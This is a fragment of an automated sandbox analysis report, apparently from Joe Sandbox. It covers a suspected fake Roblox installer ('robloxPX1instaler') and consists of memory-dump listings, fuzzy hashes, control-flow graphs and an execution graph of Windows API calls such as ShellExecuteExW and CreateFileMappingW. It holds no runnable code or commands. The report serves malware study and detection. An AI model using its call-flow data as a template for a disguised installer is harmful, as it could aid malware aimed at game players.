                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 1170836740-1018135373
                                                                                  • Opcode ID: e858eadf318de28e4032b50e93c8570c110e8a19b68b577b5f2869e81d36f6ec
                                                                                  • Instruction ID: 62f3e987d6850b89bb5a95903f22045cacdea33e28fd3c47740c743e80692162
                                                                                  • Opcode Fuzzy Hash: e858eadf318de28e4032b50e93c8570c110e8a19b68b577b5f2869e81d36f6ec
                                                                                  • Instruction Fuzzy Hash: 4E41A430A04218BBCF10DF68E884ADEBBA5EF45314F188055F8159B396DF31EA95CBB1
                                                                                  Function 00D343CE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 172 d343ce-d3440b GetModuleHandleExW 173 d3442e-d34432 172->173 174 d3440d-d3441f GetProcAddress 172->174 176 d34434-d34437 FreeLibrary 173->176 177 d3443d-d3444a 173->177 174->173 175 d34421-d3442c 174->175 175->173 176->177
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1600CF06,?,?,00000000,00D5D7FB,000000FF,?,00D343A1,00000002,?,00D34375,00D2466F), ref: 00D34403
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D34415
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D5D7FB,000000FF,?,00D343A1,00000002,?,00D34375,00D2466F), ref: 00D34437
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: e0be94f3dede99addb3fa144bb5f5c09c5b3fb77e6e99b59cc788ff549160c19
                                                                                  • Instruction ID: e88f80b35a56e9d7ec751bc991d6c33bd3ec851209a7a1bf78b9110982cfb1a4
                                                                                  • Opcode Fuzzy Hash: e0be94f3dede99addb3fa144bb5f5c09c5b3fb77e6e99b59cc788ff549160c19
                                                                                  • Instruction Fuzzy Hash: C101DB31500729AFCB118F50DC05FAE77B8FB08B55F044625F811E2390DFB89900DAB0
                                                                                  Function 00D339C5 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 306COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 179 d339c5-d339e6 call d13450 182 d33a00-d33a03 179->182 183 d339e8 179->183 184 d33a21-d33a2d call d3a316 182->184 185 d33a05-d33a08 182->185 183->184 186 d339ea-d339f0 183->186 197 d33a37-d33a43 call d33927 184->197 198 d33a2f-d33a32 184->198 187 d33a14-d33a1f call d338e5 185->187 188 d33a0a-d33a0d 185->188 186->187 190 d339f2-d339f6 186->190 202 d33a5f-d33a68 187->202 191 d33a45-d33a55 call d1e672 call d1e574 188->191 192 d33a0f-d33a12 188->192 190->184 195 d339f8-d339fc 190->195 191->198 192->187 192->191 195->191 200 d339fe 195->200 197->191 213 d33a57-d33a5c 197->213 203 d33b94-d33ba3 198->203 200->187 206 d33a75-d33a85 202->206 207 d33a6a-d33a72 call d34802 202->207 211 d33a87-d33a98 206->211 212 d33a9b-d33aa9 206->212 207->206 211->212 215 d33aab-d33aad 212->215 216 d33b1c-d33b2c call d33b51 212->216 213->202 218 d33ab3-d33ab5 215->218 219 d33ba4-d33ba6 215->219 229 d33b92 216->229 230 d33b2e-d33b30 216->230 223 d33ac1-d33ad0 218->223 224 d33ab7-d33aba 218->224 220 d33bb0-d33bca call d3447d call d13450 219->220 221 d33ba8-d33baf call d3484a 219->221 249 d33bd0-d33bd3 220->249 250 d33d5e 220->250 221->220 225 d33b12-d33b1a 223->225 226 d33ad2-d33ae2 call d3a1c5 * 2 223->226 224->223 231 d33abc-d33abf 224->231 225->216 237 d33ae9-d33aee 226->237 229->203 235 d33b32-d33b46 call d3a1c5 230->235 236 d33b60-d33b69 230->236 231->223 231->237 252 d33b6b-d33b6e 235->252 236->252 237->225 239 d33af0-d33b00 237->239 245 d33b02-d33b07 239->245 245->216 248 d33b09-d33b10 245->248 248->245 249->250 253 d33bd9-d33bdf 249->253 254 d33d61-d33d66 call d3394f 250->254 255 d33b70-d33b73 252->255 256 d33b7a-d33b85 252->256 257 d33be5-d33be8 253->257 258 d33c9e-d33cb9 call d34802 253->258 266 d33d67-d33d76 254->266 255->256 263 d33b75-d33b78 255->263 256->229 264 d33b87-d33b8f call d3a1c5 256->264 257->258 265 d33bee-d33bf1 257->265 271 d33cc0-d33cc7 258->271 272 d33cbb-d33cbe 258->272 263->229 263->256 264->229 265->258 269 d33bf7-d33bfa 265->269 269->258 270 d33c00-d33c03 269->270 270->258 274 d33c09-d33c0c 270->274 275 d33cfa-d33d0a call d338e5 271->275 276 d33cc9-d33cd8 SetConsoleCtrlHandler 271->276 272->271 272->275 277 d33c1e-d33c27 call d3a316 274->277 278 d33c0e-d33c11 274->278 288 d33d31-d33d42 call d33d55 275->288 289 d33d0c-d33d23 275->289 280 d33ce3-d33cf7 GetLastError call d1e65f 276->280 281 d33cda-d33ce1 276->281 287 d33c18-d33c19 277->287 292 d33c29-d33c30 277->292 278->277 283 d33c13-d33c16 278->283 280->275 281->275 283->277 283->287 287->254 288->287 301 d33d48-d33d4a 288->301 289->288 291 d33d25-d33d2f call d3381c 289->291 291->288 295 d33c32-d33c38 call d3a4ea 292->295 296 d33c5a-d33c67 call d33927 292->296 303 d33c3d-d33c42 295->303 296->287 304 d33c69-d33c74 296->304 301->266 303->287 305 d33c44-d33c58 call d13cf0 303->305 304->266 306 d33c7a-d33c81 304->306 305->296 308 d33c83-d33c85 306->308 310 d33c87-d33c8a 308->310 311 d33c96-d33c99 308->311 310->311 312 d33c8c-d33c94 310->312 311->266 312->308
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @2
                                                                                  • API String ID: 0-2965403045
                                                                                  • Opcode ID: fc7f66a67da32abad67b56ad4d06c665252c48428ffbe5dda496a44f587a86b4
                                                                                  • Instruction ID: 587bba8a4e7d40d8850612008250fe9c37a3e6f36c76e19c900ad43ae35a905f
                                                                                  • Opcode Fuzzy Hash: fc7f66a67da32abad67b56ad4d06c665252c48428ffbe5dda496a44f587a86b4
                                                                                  • Instruction Fuzzy Hash: 09A1E172E002158FDF25AFACDA856ACB7B1EF55310F1D4029E485BB2A1DB359E80CB71

                                                                                  Execution Graph

                                                                                  Execution Coverage:11.7%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:14.7%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:31
                                                                                  execution_graph 25934 7ff75456b190 26277 7ff75454255c 25934->26277 25936 7ff75456b1db 25937 7ff75456be93 25936->25937 25938 7ff75456b1ef 25936->25938 25940 7ff75456b20c 25936->25940 26562 7ff75456f390 25937->26562 25938->25940 25943 7ff75456b2db 25938->25943 25944 7ff75456b1ff 25938->25944 26647 7ff754572320 25940->26647 25950 7ff75456b391 25943->25950 25955 7ff75456b2f5 25943->25955 25948 7ff75456b2a9 25944->25948 25949 7ff75456b207 25944->25949 25945 7ff75456bec9 25952 7ff75456bed5 SendDlgItemMessageW 25945->25952 25953 7ff75456bef0 GetDlgItem IsDlgButtonChecked 25945->25953 25946 7ff75456beba IsDlgButtonChecked 25946->25945 25948->25940 25954 7ff75456b2cb EndDialog 25948->25954 25949->25940 25958 7ff75455aae0 48 API calls 25949->25958 26285 7ff7545422bc GetDlgItem 25950->26285 25952->25953 26581 7ff7545562dc GetCurrentDirectoryW 25953->26581 25954->25940 25959 7ff75455aae0 48 API calls 25955->25959 25963 7ff75456b236 25958->25963 25960 7ff75456b313 SetDlgItemTextW 25959->25960 25965 7ff75456b326 25960->25965 25961 7ff75456b3b1 EndDialog 26138 7ff75456b3da 25961->26138 25962 7ff75456bf47 GetDlgItem 26591 7ff754542520 25962->26591 26595 7ff754541ec4 34 API calls _handle_error 25963->26595 25964 7ff75456b408 GetDlgItem 25968 7ff75456b422 IsDlgButtonChecked IsDlgButtonChecked 25964->25968 25969 7ff75456b44f SetFocus 25964->25969 25965->25940 25974 7ff75456b340 GetMessageW 25965->25974 25968->25969 25975 7ff75456b465 25969->25975 25976 7ff75456b4f2 25969->25976 25972 7ff75456b246 25973 7ff75456b25c 25972->25973 26596 7ff75454250c 25972->26596 25973->25940 25992 7ff75456c363 25973->25992 25974->25940 25981 7ff75456b35e IsDialogMessageW 25974->25981 25982 7ff75455aae0 48 API calls 25975->25982 26299 7ff754548d04 25976->26299 25981->25965 25987 7ff75456b373 TranslateMessage DispatchMessageW 25981->25987 25988 7ff75456b46f 25982->25988 25983 7ff75456bcc5 25989 7ff75455aae0 48 API calls 25983->25989 25984 7ff754541fa0 31 API calls 25984->25940 25986 7ff75456b52c 26309 7ff75456ef80 25986->26309 25987->25965 26599 7ff75454129c 25988->26599 25993 7ff75456bcd6 SetDlgItemTextW 25989->25993 26656 7ff754577904 25992->26656 25996 7ff75455aae0 48 API calls 25993->25996 26002 7ff75456bd08 25996->26002 26019 7ff75454129c 33 API calls 26002->26019 26003 7ff75456c368 26012 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26003->26012 26006 7ff75456b498 26010 7ff75456f0a4 24 API calls 26006->26010 26017 7ff75456b4a5 26010->26017 26020 7ff75456c36e 26012->26020 26017->26003 26033 7ff75456b4e8 26017->26033 26042 7ff75456bd31 26019->26042 26026 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26020->26026 26025 7ff75456bdda 26034 7ff75455aae0 48 API calls 26025->26034 26035 7ff75456c374 26026->26035 26032 7ff75456b5ec 26045 7ff75456b61a 26032->26045 26610 7ff7545532a8 26032->26610 26033->26032 26609 7ff75456fa80 33 API calls 2 library calls 26033->26609 26047 7ff75456bde4 26034->26047 26054 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26035->26054 26039 7ff754541fa0 31 API calls 26050 7ff75456b586 26039->26050 26042->26025 26055 7ff75454129c 33 API calls 26042->26055 26347 7ff754552f58 26045->26347 26066 7ff75454129c 33 API calls 26047->26066 26050->26020 26050->26033 26060 7ff75456c37a 26054->26060 26061 7ff75456bd7f 26055->26061 26071 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26060->26071 26067 7ff75455aae0 48 API calls 26061->26067 26064 7ff75456b64c 26359 7ff754557fc4 26064->26359 26065 7ff75456b634 GetLastError 26065->26064 26070 7ff75456be0d 26066->26070 26073 7ff75456bd8a 26067->26073 26069 7ff75456b60e 26613 7ff754569d90 12 API calls _handle_error 26069->26613 26083 7ff75454129c 33 API calls 26070->26083 26077 7ff75456c380 26071->26077 26079 7ff754541150 33 API calls 26073->26079 26084 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26077->26084 26086 7ff75456bda2 26079->26086 26081 7ff75456b65e 26082 7ff75456b665 GetLastError 26081->26082 26089 7ff75456b674 26081->26089 26082->26089 26090 7ff75456be4e 26083->26090 26091 7ff75456c386 26084->26091 26643 7ff754542034 26086->26643 26088 7ff75456b71c 26092 7ff75456b72b 26088->26092 26112 7ff75456bb79 26088->26112 26089->26088 26089->26092 26094 7ff75456b68b GetTickCount 26089->26094 26105 7ff754541fa0 31 API calls 26090->26105 26095 7ff75454255c 61 API calls 26091->26095 26096 7ff75456ba50 26092->26096 26614 7ff754556454 26092->26614 26362 7ff754544228 26094->26362 26099 7ff75456c3e4 26095->26099 26096->25961 26638 7ff75454bd0c 33 API calls 26096->26638 26097 7ff75456bdbe 26102 7ff754541fa0 31 API calls 26097->26102 26106 7ff75456c3e8 26099->26106 26107 7ff75456c489 GetDlgItem SetFocus 26099->26107 26157 7ff75456c3fd 26099->26157 26110 7ff75456bdcc 26102->26110 26114 7ff75456be78 26105->26114 26117 7ff754572320 _handle_error 8 API calls 26106->26117 26121 7ff75456c4ba 26107->26121 26109 7ff75456b74e 26626 7ff75455b914 102 API calls 26109->26626 26120 7ff754541fa0 31 API calls 26110->26120 26123 7ff75455aae0 48 API calls 26112->26123 26113 7ff75456ba75 26639 7ff754541150 26113->26639 26116 7ff754541fa0 31 API calls 26114->26116 26125 7ff75456be83 26116->26125 26126 7ff75456ca97 26117->26126 26120->26025 26134 7ff75454129c 33 API calls 26121->26134 26122 7ff75456b6ba 26372 7ff754541fa0 26122->26372 26129 7ff75456bba7 SetDlgItemTextW 26123->26129 26124 7ff75456ba8a 26130 7ff75455aae0 48 API calls 26124->26130 26131 7ff754541fa0 31 API calls 26125->26131 26127 7ff75456b768 26133 7ff75455da98 48 API calls 26127->26133 26136 7ff754542534 26129->26136 26137 7ff75456ba97 26130->26137 26131->26138 26132 7ff75456c434 SendDlgItemMessageW 26139 7ff75456c45d EndDialog 26132->26139 26140 7ff75456c454 26132->26140 26141 7ff75456b7aa GetCommandLineW 26133->26141 26142 7ff75456c4cc 26134->26142 26135 7ff75456b6c8 26377 7ff754552134 26135->26377 26143 7ff75456bbc5 SetDlgItemTextW GetDlgItem 26136->26143 26144 7ff754541150 33 API calls 26137->26144 26138->25984 26139->26106 26140->26139 26145 7ff75456b869 26141->26145 26146 7ff75456b84f 26141->26146 26661 7ff7545580d8 33 API calls 26142->26661 26149 7ff75456bc13 26143->26149 26150 7ff75456bbf0 GetWindowLongPtrW SetWindowLongPtrW 26143->26150 26151 7ff75456baaa 26144->26151 26631 7ff75456ab54 33 API calls _handle_error 26145->26631 26627 7ff7545420b0 26146->26627 26397 7ff75456ce88 26149->26397 26150->26149 26156 7ff754541fa0 31 API calls 26151->26156 26152 7ff75456c4e0 26158 7ff75454250c SetDlgItemTextW 26152->26158 26163 7ff75456bab5 26156->26163 26157->26106 26157->26132 26165 7ff75456c4f4 26158->26165 26159 7ff75456b87a 26632 7ff75456ab54 33 API calls _handle_error 26159->26632 26160 7ff75456b6f5 GetLastError 26161 7ff75456b704 26160->26161 26393 7ff75455204c 26161->26393 26169 7ff754541fa0 31 API calls 26163->26169 26174 7ff75456c526 SendDlgItemMessageW FindFirstFileW 26165->26174 26168 7ff75456ce88 160 API calls 26172 7ff75456bc3c 26168->26172 26173 7ff75456bac3 26169->26173 26170 7ff75456b88b 26633 7ff75456ab54 33 API calls _handle_error 26170->26633 26547 7ff75456f974 26172->26547 26184 7ff75455aae0 48 API calls 26173->26184 26178 7ff75456c57b 26174->26178 26270 7ff75456ca04 26174->26270 26189 7ff75455aae0 48 API calls 26178->26189 26179 7ff75456b89c 26634 7ff75455b9b4 102 API calls 26179->26634 26182 7ff75456ca81 26182->26106 26183 7ff75456ce88 160 API calls 26199 7ff75456bc6a 26183->26199 26188 7ff75456badb 26184->26188 26185 7ff75456b8b3 26635 7ff75456fbdc 33 API calls 26185->26635 26187 7ff75456caa9 26192 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26187->26192 26200 7ff75454129c 33 API calls 26188->26200 26190 7ff75456c59e 26189->26190 26202 7ff75454129c 33 API calls 26190->26202 26191 7ff75456b8d2 CreateFileMappingW 26194 7ff75456b953 ShellExecuteExW 26191->26194 26195 7ff75456b911 MapViewOfFile 26191->26195 26196 7ff75456caae 26192->26196 26193 7ff75456bc96 26561 7ff754542298 GetDlgItem EnableWindow 26193->26561 26217 7ff75456b974 26194->26217 26636 7ff754573640 26195->26636 26203 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26196->26203 26199->26193 26204 7ff75456ce88 160 API calls 26199->26204 26211 7ff75456bb04 26200->26211 26201 7ff75456b3f5 26201->25961 26201->25983 26205 7ff75456c5cd 26202->26205 26206 7ff75456cab4 26203->26206 26204->26193 26207 7ff754541150 33 API calls 26205->26207 26210 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26206->26210 26208 7ff75456c5e8 26207->26208 26662 7ff75454e164 33 API calls 2 library calls 26208->26662 26209 7ff75456b9c3 26218 7ff75456b9dc UnmapViewOfFile CloseHandle 26209->26218 26219 7ff75456b9ef 26209->26219 26214 7ff75456caba 26210->26214 26211->26060 26212 7ff75456bb5a 26211->26212 26215 7ff754541fa0 31 API calls 26212->26215 26222 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26214->26222 26215->25961 26216 7ff75456c5ff 26220 7ff754541fa0 31 API calls 26216->26220 26217->26209 26224 7ff75456b9b1 Sleep 26217->26224 26218->26219 26219->26035 26221 7ff75456ba25 26219->26221 26223 7ff75456c60c 26220->26223 26226 7ff754541fa0 31 API calls 26221->26226 26225 7ff75456cac0 26222->26225 26223->26196 26228 7ff754541fa0 31 API calls 26223->26228 26224->26209 26224->26217 26229 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26225->26229 26227 7ff75456ba42 26226->26227 26230 7ff754541fa0 31 API calls 26227->26230 26231 7ff75456c673 26228->26231 26232 7ff75456cac6 26229->26232 26230->26096 26233 7ff75454250c SetDlgItemTextW 26231->26233 26235 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26232->26235 26234 7ff75456c687 FindClose 26233->26234 26236 7ff75456c797 SendDlgItemMessageW 26234->26236 26237 7ff75456c6a3 26234->26237 26238 7ff75456cacc 26235->26238 26239 7ff75456c7cb 26236->26239 26663 7ff75456a2cc 10 API calls _handle_error 26237->26663 26242 7ff75455aae0 48 API calls 26239->26242 26241 7ff75456c6c6 26243 7ff75455aae0 48 API calls 26241->26243 26244 7ff75456c7d8 26242->26244 26245 7ff75456c6cf 26243->26245 26247 7ff75454129c 33 API calls 26244->26247 26246 7ff75455da98 48 API calls 26245->26246 26250 7ff75456c6ec BuildCatchObjectHelperInternal 26246->26250 26249 7ff75456c807 26247->26249 26248 7ff754541fa0 31 API calls 26251 7ff75456c783 26248->26251 26252 7ff754541150 33 API calls 26249->26252 26250->26206 26250->26248 26253 7ff75454250c SetDlgItemTextW 26251->26253 26254 7ff75456c822 26252->26254 26253->26236 26664 7ff75454e164 33 API calls 2 library calls 26254->26664 26256 7ff75456c839 26257 7ff754541fa0 31 API calls 26256->26257 26258 7ff75456c845 BuildCatchObjectHelperInternal 26257->26258 26259 7ff754541fa0 31 API calls 26258->26259 26260 7ff75456c87f 26259->26260 26261 7ff754541fa0 31 API calls 26260->26261 26262 7ff75456c88c 26261->26262 26262->26214 26263 7ff754541fa0 31 API calls 26262->26263 26264 7ff75456c8f3 26263->26264 26265 7ff75454250c SetDlgItemTextW 26264->26265 26266 7ff75456c907 26265->26266 26266->26270 26665 7ff75456a2cc 10 API calls _handle_error 26266->26665 26268 7ff75456c932 26269 7ff75455aae0 48 API calls 26268->26269 26271 7ff75456c93c 26269->26271 26270->26106 26270->26182 26270->26187 26270->26232 26272 7ff75455da98 48 API calls 26271->26272 26274 7ff75456c959 BuildCatchObjectHelperInternal 26272->26274 26273 7ff754541fa0 31 API calls 26275 7ff75456c9f0 26273->26275 26274->26225 26274->26273 26276 7ff75454250c SetDlgItemTextW 26275->26276 26276->26270 26278 7ff75454256a 26277->26278 26279 7ff7545425d0 26277->26279 26278->26279 26666 7ff75455a4ac 26278->26666 26279->25936 26281 7ff75454258f 26281->26279 26282 7ff7545425a4 GetDlgItem 26281->26282 26282->26279 26283 7ff7545425b7 26282->26283 26283->26279 26284 7ff7545425be SetDlgItemTextW 26283->26284 26284->26279 26286 7ff7545422fc 26285->26286 26287 7ff754542334 26285->26287 26289 7ff75454129c 33 API calls 26286->26289 26758 7ff7545423f8 GetWindowTextLengthW 26287->26758 26290 7ff75454232a BuildCatchObjectHelperInternal 26289->26290 26291 7ff754542389 26290->26291 26292 7ff754541fa0 31 API calls 26290->26292 26295 7ff7545423f0 26291->26295 26296 7ff7545423c8 26291->26296 26292->26291 26293 7ff754572320 _handle_error 8 API calls 26294 7ff7545423dd 26293->26294 26294->25961 26294->25964 26294->26201 26297 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26295->26297 26296->26293 26298 7ff7545423f5 26297->26298 26301 